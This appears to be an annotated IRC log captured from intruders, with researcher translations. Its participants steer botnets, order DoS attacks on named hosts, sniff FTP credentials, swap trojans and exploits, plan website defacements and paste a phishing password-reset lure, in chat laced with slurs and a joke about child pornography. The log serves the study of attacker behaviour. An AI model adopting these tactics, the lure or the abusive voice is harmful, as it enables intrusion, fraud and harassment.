      :D1ck! :bye
      :D1ck! : SignOff m4ry: 
      :D1ck! :fuck
      :D1ck! :J4n3 
      :D1ck! :the box i owned .xx
      :D1ck! :i saw h4r33 logging in with root/owned
      :D1ck! :but i dont use root/owned
      :D1ck! :so its his box
      :D1ck! :HAHAHAHAHA
      :D1ck! :lamah
      :D1ck! :brb
      :D1ck! :yo
      :D1ck! :J4n3 
      :D1ck! :there?
      :D1ck! :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck! :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck! :dos_ nic dns-gov
      :D1ck! :dos_ nick dns-gov
      :D1ck! :dos__ nick ^6thsense
      :D1ck! :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck! :_EATHaCeS nick jupe-bot
      :D1ck! :__ATHaCeS nick jupe2-bot
      :D1ck! :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck! :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck! :dos_ nick k-rad
      :D1ck! :dos__ nick hyper
      :D1ck! :dos___ nick teardrop
      :D1ck! :dos___ nick pepsi
      :D1ck! :dos____ nick pepsi
      :D1ck! :DoS____  nick pepsi
      :D1ck! :dos_
      :D1ck! :dos_ say hehe
      :DoS_! :hehe
      :D1ck! :dos__ say hehe
      :D1ck! :dos___ say hehe
      :DoS___! :hehe
      :D1ck! :dos____ say hehe
      :DoS____! :hehe
      :D1ck! :dos_ nick k-rad-
      :D1ck! :dos___ nick neat
      :D1ck! :dos____ nick bawt
      :D1ck! :dos____ nick TotalKaoS
      :D1ck! :dos____ nick Tota1KaaS
      :D1ck! :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      USER werd . . :DoS
      
      =-
      
      Day 05 June 8
      
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3 :errrrrrr
      :J4n3 :why banned ? :(
      :D1ck :?
      :D1ck :oh
      :J4n3 :heh id id
      :D1ck :i thouh
      :D1ck :oh
      :D1ck ::)
      :D1ck :d4v3 
      :J4n3 :haha k
      :D1ck :i lost my NS
      :D1ck ::(
      :J4n3 :listen
      :D1ck :):
      :D1ck :?
      :J4n3 :oh shit
      :J4n3 :bad very bad
      :D1ck :??
      :D1ck :<J4n3> listen
      :D1ck :<J4n3> listen
      :D1ck :<J4n3> listen
      :D1ck :?
      :D1ck :example.com.pk,example.net, example.com
      :D1ck :J4n3 
      :D1ck :user192-168-74-106.example.net
      :D1ck :bsd.example.com
      :D1ck :is.the.fresh.prince.of.hardcore.example.xx.us
      :D1ck :dos those 3
      :D1ck :please
      :D1ck :
      :D1ck :PLEASE
      :D1ck :PLEASE
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :?
      :D1ck :Inspectah 
      :D1ck :inst
      :J4n3 :d1ck
      :J4n3 :.up
      :J4n3 :[ b-a-c-k ]
      :m4ry :i hate this place
      :m4ry ::)
      :J4n3 :[ frozen ] [ Auto-away after 15 mins - 00:01:41 ] - [J4n3-X] [1.0]
      :J4n3 :[ frozen ] [ Auto-away after 15 mins - 00:01:41 ] - [J4n3-X] [1.0]
      :J4n3 :.up
      :D1ck :.op
      :D1ck :mop
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :Sp07 :suck
      :Sp07 :dick
      :Sp07 :and
      :Sp07 :die
      :D1ck :heh
      :D1ck :man
      :D1ck :i lost 2 NS$@$
      :D1ck :right nw
      :Sp07 :that
      :Sp07 :sucks
      :Sp07 :dick
      :D1ck :5 minutes
      :D1ck :some moron tookover
      :Sp07 :fucking #7thsphere can never get x/w
      :Sp07 :how fucking gay
      :D1ck :and his kit overwrote all my backdoors
      :D1ck :hahahaha
      :D1ck :x/q == gay
      :D1ck :x/w == gay
      :Sp07 :[03:50] <RWI> Sp07, I did answer your question. If you know so much, I can't help you anymore. :)
      :Sp07 :what a little bitch
      :Sp07 :hehe
      :D1ck :HAHAHAHA
      :D1ck :#cservice
      :D1ck :#zy
      :D1ck :#zt
      :D1ck :gay
      :D1ck :@@@@@@@@@@@@
      :D1ck :
      :Sp07 :i was asking them if 7thsphere can be registered
      :Sp07 :they said no its a "war program"
      :D1ck :hahahaha
      :Sp07 :what a fucking moron
      :D1ck :LOl
      :D1ck :fuck my mood's off
      :D1ck :coz i saw some morons nick
      :Sp07 :?
      :D1ck :'D1z4574
      :Sp07 :[03:52] <RWI> Sp07, I did help you. #7thsphere will NEVER be removed from the blacklist
      :D1ck :'D1z4574'
      :Sp07 :hahaha
      :D1ck :ROFLAMO
      :D1ck :Sp07 
      :D1ck :i`m leeeet
      :D1ck :
      :D1ck ::)
      :Sp07 :[03:52] <Sp07> why will it be never removed/
      :Sp07 :[03:52] <Sp07> ?
      :Sp07 :[03:52] <Sp07> cause your too lazy to take it off?
      :D1ck :HAHAHAHHAHAHA
      :D1ck :+b
      :D1ck :?
      :Sp07 :[03:53] *** You were kicked from #CSERVICE by X ((RWI) Too lame to be on IRC)
      :Sp07 :hehe
      :D1ck :lol
      :Sp07 :let me message that whore
      :D1ck :./dso
      :D1ck :./dos
      :D1ck :oki
      :Sp07 :not yet
      :Sp07 :ill dos him
      :Sp07 :after im done talking to him
      :D1ck :oki
      :D1ck :say 'dont mess with #delusion'
      :D1ck :hahaha
      :D1ck :or i`ll dos j0h
      :D1ck :man
      :D1ck :hm
      :Sp07 :did you hack any irix?
      :D1ck :irc sucks
      :Sp07 :Sp07 is ~Sp07@delta.example.edu * ?
      :D1ck :i`m bored
      :Sp07 :yep
      :D1ck :nop
      :D1ck :i tried
      :D1ck :it hangs
      :D1ck ::)
      :D1ck :Sp07 
      :D1ck :help m
      :D1ck :me
      :Sp07 :?
      :D1ck :192.168.1.22 => ns2.example.net [21]
      :D1ck :USER root
      :D1ck :CWD ~meltahir
      :D1ck :PORT 192,168,1,22,149,231
      :D1ck :LIST mod*
      :D1ck :TYPE I
      :Sp07 :ACTION helps d1ck
      :D1ck :PORT 192.168,1,22,149,232
      :D1ck :TYPE A
      :D1ck :NLST mod_perl-1.24.tar.gz
      :D1ck :what the fuck?
      :Sp07 :thats h4r33s shell
      :Sp07 :hehahaha
      :Sp07 :e
      :D1ck :thats the root pass for ns2.example.net ?
      :Sp07 :no
      :D1ck :nope its not
      :D1ck :its on a subnet
      :D1ck :then?
      :Sp07 :then?
      :Sp07 :I dunno
      :Sp07 :where are you sniffing from?
      :Sp07 :umm doesnt it have to be the same network?
      :D1ck :tango.example.com
      :D1ck :dunno
      :Sp07 :192.168.1.1 192.168.1.10
      :Sp07 :yeah
      :Sp07 :just wait
      :Sp07 :and I think you wioll get someones password
      :D1ck :oki
      :Sp07 :I got that sometimes
      :Sp07 :where it wouldnt show the password
      :Sp07 :or when it wouldnt show user and pass
      :Sp07 :some fucker was dosing me today =(
      :D1ck :oh
      :Sp07 :some pussy
      :D1ck :haha
      :Sp07 :was it you?
      :D1ck :weeeeeena
      :Sp07 :j/k
      :D1ck ::(
      :Sp07 :they dosed my friends shell
      :D1ck :OH Sp07 
      :D1ck :potheads.com?
      :Sp07 :but when I got on this I dont think they could dos it no mor
      :Sp07 :yeah
      :Sp07 :.net
      :D1ck :make me a VHOST
      :Sp07 :I cant
      :D1ck :h4r33.is.a.fucking.example.com
      :Sp07 :thats a good thing
      :Sp07 :heeh
      :D1ck :h4r33.and.grid.are.fucking.example.com
      :D1ck :hehe
      :Sp07 :why you complimenting him??
      :Sp07 :im a pothead
      :Sp07 :hehe
      :D1ck :oh
      :D1ck :what does it mean btw :P
      :D1ck :?
      :Sp07 :someone who smokes lots of weed
      :Sp07 :hahaha
      :Sp07 :pot-heads
      :Sp07 :pot = weed
      :D1ck :oh
      :D1ck :i get tons f weed
      :D1ck :but
      :D1ck :i dont do it
      :Sp07 :heh
      :Sp07 :not weed in your garden or anything
      :Sp07 :the drug
      :Sp07 :s
      :Sp07 :drug weed
      :Sp07 :I got some weed with me right now
      :D1ck :  192.168.1.22 => ns2.example.net [21]
      :D1ck :USER root
      :D1ck :CWD ~meltahir
      :Sp07 :but I cant smoke it cause my dads here
      :D1ck :man
      :D1ck :wtf is that?
      :Sp07 :cwd
      :Sp07 :that is like
      :Sp07 :umm
      :D1ck :haha
      :Sp07 :cd ~meltahir
      :Sp07 :like its a directory
      :D1ck :oh
      :D1ck :ah
      :D1ck ::)
      :D1ck :ok
      :Sp07 :its not his password hehe
      :Sp07 :[04:06] <PAKT>  Hackers and crackers wanna help us in #pakt ?? We need to hack the undernet and the fucking lame opers come join and ask |W|-|G| for more info, thanks for your help.. KILL THE UNDERNET
      :Sp07 :hahaha
      :Sp07 :lets go dos all of them
      :D1ck :hahahahaha
      :Sp07 :they kicked me =(
      :D1ck ::)
      :Sp07 :we need to do something on irc that will make us money
      :D1ck :<Paladin`> i help pakt out with the reporting of child pornographers
      :D1ck :AHAHAHAHAHA
      :Sp07 :ns3.example.net
      :D1ck :I WANT KIDDIE PORN
      :Sp07 :thats h4r33
      :D1ck :yeah i know
      :Sp07 :ACTION slaps sximap around a bit with a large trout
      :Sp07 :oops
      :D1ck :rofl
      :D1ck :man
      :D1ck :i`m hunguhry
      :Sp07 :go eat 
      :D1ck :its 4 am
      :Sp07 :go hunting
      :D1ck :and kithen is downstair
      :Sp07 :go hunt for some cockroaches
      :D1ck ::(
      :D1ck :rofl
      :Sp07 :mmMMmMMmmmmm
      :Sp07 :m
      :D1ck ::)
      :D1ck :?
      :D1ck :MY LINUX MECHS ROCKS
      :D1ck :%$#@
      :D1ck :i lost my 90 day uptime box
      :D1ck ::(
      :Sp07 :heh
      :Sp07 :ITS ALMOST TIME FOR ME TO SMOKE SOME WEEED
      :Sp07 :noddles?
      :Sp07 :hehe
      :D1ck :hahaa
      :D1ck :hehe
      :D1ck ::)
      :Sp07 :isnt it neat
      :Sp07 :eat
      :Sp07 :hehe
      :Sp07 :you think too much about food
      :D1ck ::)
      :D1ck :i`m FAT
      :D1ck ::)
      :D1ck :hehe
      :Sp07 :forr eal?
      :Sp07 :heh
      :Sp07 :you fat ass
      :D1ck :dont taunt me :(
      :Sp07 :how much do you weigh?
      :D1ck :):
      :Sp07 :sorry
      :D1ck :400 
      :D1ck :400 
      :D1ck :np
      :Sp07 :lol
      :D1ck ::)
      :Sp07 :for real
      :D1ck :oh well 300
      :D1ck ::)
      :Sp07 :how much do you weight?
      :D1ck :for real
      :D1ck :300 punds
      :Sp07 :for real?
      :D1ck :yes
      :Sp07 :you serious?
      :D1ck :for real
      :D1ck :
      :D1ck :yep
      :D1ck ::)
      :D1ck :serious
      :Sp07 :dont lie
      :Sp07 :hehe
      :D1ck :i`m FAT
      :Sp07 :300 is a lot
      :D1ck :as
      :D1ck :s
      :D1ck ::)
      :D1ck :nope i`m 300#$@
      :Sp07 :how old are you?
      :D1ck :17
      :D1ck :;>
      :Sp07 :DAMN
      :Sp07 :hehe
      :D1ck :kaos_ nick jupe
      :Sp07 :DAYUMMMMM
      :D1ck :kaos_ nick jupah
      :D1ck :.save
      :D1ck ::)
      :D1ck :welp, i`ll lose it
      :Sp07 :DAYYYYYYYYUMMMMMMMMMMMMMMMMMMM
      :Sp07 :M
      :Sp07 :does that look like H OR M?
      :D1ck :hahaa
      :Sp07 :H M
      :D1ck :dude
      :D1ck :4 years back
      :Sp07 :H M
      :Sp07 :H M
      :D1ck :i was 400
      :D1ck :and then i lost 200
      :Sp07 :DAYUMMMMMMMMM
      :Sp07 :you liar
      :D1ck :nutriotion
      :D1ck :and then
      :Sp07 :how can you be 400 pounds when your 13?
      :D1ck :I WAS
      :Sp07 :you liar
      :D1ck :tendency
      :D1ck :and
      :D1ck :lots of eating
      :D1ck :but then i left the diet and excersise
      :D1ck :but i`ll loose it again
      :D1ck :i`m serious now
      :D1ck ::)
      :Sp07 :400 is too much for a 13 year old
      :D1ck :when i`m serious imake sure to achieve the goal
      :Sp07 :maybe like 200 is cool
      :Sp07 :but 400
      :Sp07 :no way
      :D1ck :hahahaha
      :Sp07 :200 is still fat but 400 is like a fucking elephant
      :Sp07 :ehhe
      :D1ck :yep
      :Sp07 :I weigh like 150 right now
      :D1ck :200 with my height is all good.
      :D1ck :i`m 6,3
      :D1ck :i`m 6.3
      :Sp07 :your like twice as big as me
      :Sp07 :as in pounds
      :D1ck :lol
      :Sp07 :hehe
      :D1ck :i`m twice as big as 80% of the ppl
      :Sp07 :im like 5'8 I think
      :D1ck :in this world
      :D1ck ::)
      :D1ck :oh
      :Sp07 :thats humungus
      :Sp07 :hehe
      :D1ck :GIGANTIC
      :Sp07 :gorganic
      :Sp07 :TITANIC
      :D1ck : hahha
      :Sp07 :for real how much do you weigh??
      :Sp07 :hehe
      :D1ck :300
      :D1ck :i`m serious damit
      :Sp07 :DAYUMMMMMMMMMM
      :Sp07 :N
      :D1ck :i eat the whole fucking day with no excersise
      :D1ck ::)
      :Sp07 :N H M
      :Sp07 :those 3 letters look the same
      :D1ck :i`ll get lYPO sUcKtiON
      :Sp07 :i dont excercise that much too
      :Sp07 :but I dont weight that much
      :D1ck :<= tendancy
      :Sp07 :whats tendancy mean
      :D1ck :U ARE A AMERICAN AND I SPEAK BETTER ENGLISH THEN U?
      :D1ck :HEHEHEHE
      :D1ck :<Sp07> whats tendancy mean
      :Sp07 :hehehe
      :Sp07 :whats it mean?
      :D1ck :tendency mean that u have that inner inheritance
      :D1ck :to get BIG
      :D1ck ::)
      :Sp07 :oh
      :D1ck :u cant help
      :D1ck :u have to work VERY VERY hard
      :D1ck :i`m targetting to lloose 60 pounds
      :D1ck :in 2 months
      :D1ck ::)
      :Sp07 :me too
      :D1ck :how much u weigh
      :D1ck :?
      :Sp07 :i want to lose 100 pounds in 2 months
      :Sp07 :I weight 400 pounds
      :D1ck :haha
      :D1ck :LOL
      :Sp07 :hehehe
      :D1ck :seriously, i`m not joking
      :D1ck :
      :Sp07 :me too
      :D1ck :=p
      :D1ck :hehe k
      :D1ck :ure smart
      :Sp07 :thanks
      :Sp07 :herhe
      :D1ck :np
      :D1ck :heh
      :Sp07 :
      :Sp07 :
      :D1ck :so sup
      :Sp07 :
      :D1ck :
      :D1ck :?
      :D1ck :
      :D1ck :
      :Sp07 :MY DICK
      :D1ck :OH
      :D1ck :CAN I HAVE A GO
      :Sp07 :I WANT TO SMOKE WEED
      :D1ck :OR U WANT THE OTHE RGUY FIRST
      :D1ck :?
      :Sp07 :NO
      :D1ck :WEE
      :D1ck :WEED
      :D1ck :WEED
      :D1ck :WEED
      :Sp07 :WEEEEEEEEED
      :D1ck :what if the cops bust u
      :D1ck :???????
      :Sp07 :NOT IF I SMOKE AT MY BACKYARD
      :Sp07 :HEHE
      :Sp07 :THEY WONT BUST ME
      :D1ck :HEHEH
      :D1ck :well
      :D1ck :my freind
      :D1ck :got
      :D1ck :busted
      :D1ck :in
      :D1ck :canada
      :Sp07 :NOTHING BIG
      :D1ck :he was smoking in his backyard
      :Sp07 :THEY JUST TAKE YOUR WEED AWAY
      :D1ck :some one comlained
      :D1ck :and he was arrested
      :Sp07 :WELL GO FUCKING KILL THEM
      :D1ck :well
      :D1ck :ure parents get charged if yure's a juvenule
      :Sp07 :UHH
      :D1ck :under juvinile delinquent act
      :Sp07 :ITS NOT THAT BIG OF A DEAL
      :Sp07 :I GOT CAUGHT A LOT OF TIMES
      :D1ck :AND U CAN BE TRIED AS A DULT
      :D1ck :AND 
      :D1ck :BUSTED
      :Sp07 :NO YOU CANT
      :D1ck :
      :Sp07 :THEY JUST TAKE YOUR WEED
      :D1ck :oh
      :D1ck :hahahaha
      :Sp07 :AND THEN THEY GO SMOKE IT
      :D1ck :j/k
      :D1ck :J/K
      :Sp07 :THOSE BASTARDS
      :Sp07 :CAN
      :Sp07 :SUCK
      :Sp07 :MY
      :Sp07 :DIACK
      :D1ck :HAHAHAHAHA
      :D1ck :complain@
      :D1ck :DOES YURE MOM AND DAD SMOKE MARAJUANA
      :D1ck :?
      :Sp07 :NO
      :D1ck :that sucks
      :D1ck :
      :Sp07 :IF I COMPLAIN THEY WILL GET THOSE STICKS AND BEAT ME
      :D1ck :all my freinds in canada's mom dad, stem mom stepdad smoked weed
      :D1ck :HAHAHAHAHAHA
      :D1ck :HAHAHAHAHAHA
      :Sp07 :HAHAHHHAHHHHHHHHHHHHHHHHHHHHHHHH
      :D1ck :HAHAHHHAHHHHHHHHHHHHHHHHHHHHHHHHAHAHAHAHAHA
      :Sp07 :ITS TRUE
      :Sp07 :THEY ARE NOT COPS
      :Sp07 :THEY ARE A GOVERNMENT GANG
      :D1ck :smoking marjuana is likee 'cool'?
      :Sp07 :I GUESS
      :Sp07 :ITS FUN
      :D1ck :oh
      :Sp07 :ITS NOT LIKE SMOKING
      :D1ck :it tastes good?
      :Sp07 :NO ITS NOT LIKE SMOKING
      :Sp07 :SMOKING CIGARETES IS LIKE POINTLESS
      :Sp07 :WEED AFFECTS YOUR MIND AND BODY
      :D1ck :yep
      :D1ck :well
      :D1ck :?
      :D1ck :oh
      :D1ck :and u get hungary
      :D1ck :and 
      :D1ck :shit
      :D1ck :?
      :Sp07 :YUP
      :Sp07 :ITS NOT JUST THAT
      :Sp07 :I LOVE WEED
      :D1ck :coolk
      :D1ck :cool
      :Sp07 :IT TAKES ME TO MY OWN WORLD
      :Sp07 :MWUHAHAHAHAHA
      :D1ck :Ok i disclose my self.
      :D1ck :I`m a FED
      :Sp07 :??
      :Sp07 :OH SHIT
      :D1ck :You are busted
      :Sp07 :FUCK YOU
      :Sp07 :DIE MOTHER FUCKER
      :Sp07 :FOR REAL????
      :Sp07 :officer
      :D1ck :yes.
      :Sp07 :suck my dick
      :D1ck :dude
      :D1ck :relax
      :Sp07 :no wonder
      :Sp07 :how would a pakistanian know english
      :Sp07 :its all clear
      :Sp07 :hey
      :D1ck :hehe
      :Sp07 :your not really a fed right??
      :D1ck :y0
      :D1ck :?
      :Sp07 :dont even joke like that
      :D1ck :nope
      :D1ck :ok
      :Sp07 :MAKES ME FEEL NERVOUS
      :D1ck :i`m not a fed
      :D1ck :why did u take it so serious?
      :Sp07 :I DUNNO
      :D1ck :oh
      :D1ck :ok
      :D1ck ::P
      :D1ck :if i was a fed
      :Sp07 :SHIT MY DADS LEAVING
      :Sp07 :TIME TO GET HIGH
      :D1ck :i wont be liek hacking shit
      :D1ck :hahahaa
      :D1ck :ok
      :Sp07 :HOPEFULLY HE WONT BE BACK FOR A WHILE
      :D1ck :<Sp07> FUCK YOU
      :D1ck :<Sp07> DIE MOTHER FUCKER
      :D1ck :<Sp07> FOR REAL????
      :D1ck :<Sp07> officer
      :D1ck :hehehe
      :Sp07 :DAMN HIS CAR IS NOT PULING OUT THE DRIVEWAY
      :D1ck :hehee
      :Sp07 :IF FEDS WERE TRYING TO CATCH ME FOR THE SHIT IVE DONE LONG TIME AGO
      :Sp07 :THAT WOULD BE FUCKED UP CAUSE I STOPPED DOING ILLEGAL SHIT NOW
      :D1ck :yep
      :Sp07 :HIS CARS GONE
      :Sp07 :BRB
      :D1ck :man dont think i`m a fed
      :D1ck ::)
      :D1ck :i`m a elite hacker
      :D1ck :brb too
      :Sp07 :FUCK
      :Sp07 :HES GONNA COME RIGHT BACK
      :D1ck :lol
      :Sp07 :*SNIFF* *SNIFF* 
      :Sp07 :I WANT TO SMOKE WEED
      :D1ck :no one else at home
      :D1ck :bro?
      :D1ck :sis
      :D1ck :mom
      :D1ck :?
      :Sp07 :MY BROTHER
      :Sp07 :BUT I DONT GIVE A FUCK
      :Sp07 :I WILL KILL HIM IF HE TELLS
      :Sp07 :HEHE
      :D1ck :LOL
      :Sp07 :HES A LITTLE KID HE DOESNT KNOW WHAT THE FUCK IS GOING ON
      :D1ck :u guys can like smoke in front of parents eh?
      :D1ck :thats like col
      :Sp07 :HELL NO
      :D1ck :cool
      :D1ck :?
      :Sp07 :WHY DO YOU THINK WE CAN SMOKE IN FRONT OF PARENTS?
      :Sp07 :FUCK YOU FED
      :Sp07 :STOP ASKING ME QUESTIONS
      :D1ck :heh
      :D1ck :coz all my freinds did
      :D1ck :
      :Sp07 :WELL DOWN IN AMERICA ITS DIFFERENT
      :D1ck :oh
      :Sp07 :YOUR A FED
      :D1ck :no
      :Sp07 :YES
      :D1ck :i`m not
      :D1ck :hehe
      :Sp07 :YES
      :Sp07 :YES
      :D1ck :man
      :D1ck :man
      :D1ck :if i were a fed
      :D1ck :why would i hack stuff?
      :D1ck :defacements
      :D1ck :qall
      :Sp07 :UHHH SO YOU SAY
      :D1ck :all these bots
      :Sp07 :JUST TO GET IN THE CROWD OF HACKERS
      :D1ck :no
      :D1ck :hehehe
      :D1ck :lol
      :Sp07 :THESE BOTS COULD BE PAYED BY THE GOVERNMENT
      :D1ck :hahah
      :D1ck :man
      :Sp07 :YOU THINK FEDS WONT DO ILLEGAL THINGS?
      :Sp07 :YEAH RIGHT
      :D1ck :what proof u want
      :D1ck :
      :D1ck :i live in pakistan
      :Sp07 :HOW DO I KNOW THAT/?
      :D1ck :call me
      :D1ck :o
      :Sp07 :GIMME YOUR #
      :D1ck :well
      :D1ck :599823
      :D1ck :call me
      :Sp07 :THATS NOT A REAL #
      :D1ck :that is
      :Sp07 :WHAT DO I PRESS ON THE PHONE
      :D1ck :9221 is the key
      :Sp07 :1-
      :Sp07 :WHAT?
      :Sp07 :19221599823???
      :D1ck :92 21 599823
      :D1ck :yea
      :D1ck :let me come with my real ip
      :Sp07 :CALL YOU SO YOU CAN TRACE MY PHONE #?
      :D1ck :man
      :Sp07 :HEHEHEEHE
      :D1ck :ask rr
      :Sp07 :just kidding
      :Sp07 :hahahaha
      :D1ck :*sigh&
      :D1ck :*sigh
      :D1ck :8:)
      :Sp07 :RR IS A FED TOO MAN
      :Sp07 :DIDNT YOU KNOW THAT?
      :D1ck :REALLY?
      :D1ck :COOOOOOOOL
      :D1ck :Sp07 
      :D1ck :are u there
      :D1ck :I AM A FED
      :D1ck ::)
      :Sp07 :?
      :Sp07 :afk
      :Sp07 :fuck tou
      :Sp07 :afk
      :D1ck :heeh
      :D1ck :k
      :D1ck :^6thsense join #grid
      :Sp07 :nacl
      :Sp07 :back
      :Sp07 :me go
      :Sp07 :bye bye
      :D1ck :dns-xxx join #grid 
      :D1ck :.part #grid 
      
      =-=
      
      Day 06 June 9
      
      :jupe__
      :D1ck :J4n3 
      :J4n3 :D1ck
      :D1ck :sup
      :D1ck ::)
      :J4n3 :i can't access www.example.com  with the user k1dd13 and pass u gave
      :D1ck :shit
      :D1ck :i think they clsoed the site?
      :D1ck :even soulslack couldnt
      :J4n3 :erhmm
      :D1ck :sha..d4v3
      :J4n3 :yup that is
      :D1ck :hmm
      :D1ck :site works?
      :J4n3 :wait
      :J4n3 :yup
      :J4n3 :site is working
      :D1ck :yaar
      :D1ck :hmm
      :D1ck :may be that little fuck changed it?
      :D1ck :i logged in witht he pass some while go
      :D1ck :sha..d4v3
      :D1ck :in the url did u choose www.example.com?
      :D1ck :in the url did u choose www.example.com?
      :D1ck :in the url did u choose www.example.com?
      :J4n3 :wait lemme login from webstie
      :J4n3 :website
      :J4n3 :yeah
      :J4n3 :i did
      :D1ck :oki
      :D1ck :oh
      :D1ck :website say karo
      
      do it from the website
      
      :D1ck :oki
      :D1ck :oye brb p00p
      :J4n3 :k
      :D1ck :~back
      :D1ck :sigh
      :D1ck ::)
      :J4n3 :ATTENTION:
      :J4n3 :Some users password information became corrupted during a hard drive backup. This is easily fixed if you
      :J4n3 :following the instructions below.
      :J4n3 :1) Go to www.example.com and log in as normal EXCEPT where it asks for your password leave it blank.
      :J4n3 :2) Once you are in your example.com account manager click on Account Information in the bottom right.
      :J4n3 :3) Next click on change password.
      :J4n3 :4) Now you are asked to type in your current password and your new passwords. Just leave the current password
      :J4n3 :opti
      :D1ck :hmmm
      :D1ck :do it@?
      :J4n3 :trying to do it, logged in from www   but again same message
      :J4n3 :trying from www.example.com
      :J4n3 :ek tho ek gantay main page load hotha hai iska
      
      one is that it takes an hour for the page to load
      
      :J4n3 ::(
      :D1ck :hmmmm
      :D1ck :hehe
      :D1ck :get it some where else?
      :J4n3 :do u have those htmls in a zip file etc ?
      :D1ck :oye
      :D1ck :J4n3 
      :D1ck :send me that linux login trojan
      :D1ck :not root/owned
      :D1ck :the other wala
      
      the other one (wala = one, in a person connotation, like "the one")
      
      :D1ck ::)
      :D1ck :yep
      :D1ck :i think i do
      :J4n3 :its on ftp get it
      :J4n3 :shell.example.net
      :D1ck :oki
      :D1ck :whats  the pass?
      :D1ck :user pass?
      :D1ck :oki
      :D1ck :ACTION is away: (sex) [BX-MsgLog On]
      :D1ck :ACTION is back from the dead. Gone 0 hrs 0 min 2 secs
      :J4n3 :hehe
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :gridisgay nick wise
      :gridisgay
      :D1ck :gridsux hostile
      :D1ck :gridsux nick le
      :gridsux
      :D1ck :gridsux nick hostile
      :D1ck :kaos__ nick thor`
      :kaos__
      :D1ck :kaos___ nick nohup
      :D1ck :kaos_ nick host-t-ns
      :kaos_
      :D1ck :kaos___ nick nohup-
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save'
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :kaos____ nick nohup-
      :kaos____
      :D1ck :nohup- nick nohup
      :nohup-
      :D1ck :nohup  save
      :D1ck :hehe
      :D1ck :hafeeeez
      :D1ck :.add J4n3 * J4n3 100 1 4
      NOTICE D1ck :Handle J4n3 is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :all new LINUX BOTS
      :D1ck :ner hot 
      :J4n3_
      :D1ck :J4n3 
      :D1ck :
      :D1ck ::)
      :D1ck :mera babies
      
      my babies
      
      :D1ck :eheheh
      :J4n3 :D1ck :)
      :J4n3 ::O)
      :D1ck ::)
      :D1ck :sup?
      :D1ck :scan isps for bind
      :D1ck :we`ll deface indian pages
      
      [note from Saumil: those bastards
      
      :D1ck ::)
      :J4n3 :errr yeah actually us raath j0e kay server par sub delete karna para tha
      
      err yeah actually that one night we had to delete everything from j0e's server
      
      :J4n3 :thakay usay patha na chalay kay mainay scanning ke the
      
      that he wouldnt come to know that i did scanning from it
      
      :D1ck :oh
      :D1ck :
      :D1ck :oki
      :D1ck :hehehe
      :J4n3 :aaj raath jama kartha hon linux say khud he
      
      tonight i will assemble (collect) everything from linux itself
      
      :D1ck :where is my account?
      :J4n3 :oye worldtel r0x now
      :D1ck :jeje
      :J4n3 ::p
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3 :D1ck
      :D1ck :yo
      :J4n3 :site is up at www.example.net
      :J4n3 :i will set up graphics and cgi password stuff tomorrw
      :D1ck :kewl
      :J4n3 :but 
      :D1ck :oki
      :J4n3 :tell me where is the link of that passwod page ?
      :J4n3 :i mean where u want to put that password page link ?
      :D1ck :?????
      :D1ck :oh
      :D1ck : /elite-sploit-59865.html
      :D1ck :?
      :J4n3 :u want that sploit page na ?? where should be the link for it from main page ?
      :D1ck :nope hidden
      :D1ck :nope hidden
      :D1ck :
      :J4n3 :ok
      :J4n3 ::)
      :D1ck :;)
      :J4n3 :www.example.net/members ?
      :D1ck :yep
      :D1ck :yep
      :J4n3 :h4r33 is ~intrusion@ns3.example.net.xx * ONLY GOD CAN JUDGE ME
      :J4n3 :h4r33 on @#delusion 
      :D1ck :hahaha
      :D1ck : SignOff h4r33: #LinuxSex (Ping timeout for h4r33[ns3.example.net.xx])
      :J4n3 :hehe 
      :J4n3 :i'm dosin satnet
      :D1ck :hehe
      :D1ck :kewl
      :D1ck :ahhahhAhaHAhahHAha
      :J4n3 :can't u see all ping time out lol
      :D1ck :hahaha
      :J4n3 :ph34r my b4ndw17h :pPpPpPP
      :D1ck ::)
      :D1ck :i pjh34r yure sk1llz muh sand niggah
      :D1ck :hehe
      :J4n3 :lol 
      :J4n3 :tight :p
      :J4n3 :oye
      :J4n3 :i have a sploit for BitchX buffer overflow
      :J4n3 :but codin kuch sahi nahin
      
      but the coding isnt correct
      
      :J4n3 :it will get a root shell on some port
      :J4n3 :BitchX 75 pana 
      :J4n3 :or 74 i think
      :D1ck :hmmmm
      :D1ck :send me the code.
      :J4n3 :itn in linux, get it later when i boot
      :D1ck :J4n3 
      :D1ck :?
      :D1ck :i`ll get 32 more bots tommorow
      :D1ck ::)
      :D1ck :oye
      :D1ck :cant access example.net
      :J4n3 :huh ?
      :J4n3 :its working fine
      :J4n3 :www.example.net
      :D1ck :hehe
      :D1ck :i tried
      :D1ck :permission denied
      :J4n3 :acha wait
      
      acha = ok, or good
      
      :D1ck ::)
      :J4n3 :D1ck try now
      :D1ck :ok
      :D1ck :brb
      :J4n3 :kkzkk
      :J4n3 :hiall nick y00z
      :hiall
      :D1ck :J4n3 
      :D1ck :there?
      :D1ck :just got back
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :kaos1299 nick link
      :D1ck :kaos2440 weener
      :D1ck :kaos452 nick queer
      :D1ck :kaos6065 nick wtf
      :kaos6065
      :D1ck :kaos6567 nick ping
      :D1ck :kaos6927 nick smurf6
